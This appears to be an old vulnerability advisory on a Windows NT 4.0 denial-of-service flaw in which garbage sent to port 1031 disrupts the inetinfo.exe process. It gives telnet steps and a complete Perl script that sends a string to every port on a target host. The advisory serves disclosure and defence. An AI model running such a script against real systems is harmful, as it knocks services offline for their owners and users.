COMMAND
inetinfo.exe
SYSTEMS AFFECTED
Win NT 4.0
PROBLEM
Looks like NT is also vulnerable to exactly the same attack as
previously posted connecting and throwing garbage at port 135 on
another port, namely 1031 (inetinfo). The inetinfo.exe process
goes insane on NT4.0.
To try, telnet to 1031 on an NT machine and type garbage, then
disconnect. Credit for this goes to Bob Beck.
Below is what Bob Beck and Chris Bayly rigged up to check.
#!/usr/local/bin/perl
use Socket;
use FileHandle;
require "chat2.pl";
$ILoveBill = $ARGV[0] && shift;
$verbose = 0; # tell me what you're hitting
$knownports = 0; # don't hit known problem ports
for ($port = $0; $port <65535; $port++)
{
if ($knownports && ($port == 135 || $port== 1031)) {
next;
}
$fh = chat::open_port($ILoveBill, $port);
chat::print ($fh,"Windows NT is the platform of the future");
if ($verbose) {
print "Trying port: $port\n\n";
}
chat::close($fh);
}
SOLUTION
Not available at this momemnt. Anyway, see if You need
vulenarable ports. If You don't, GREAT and disable them!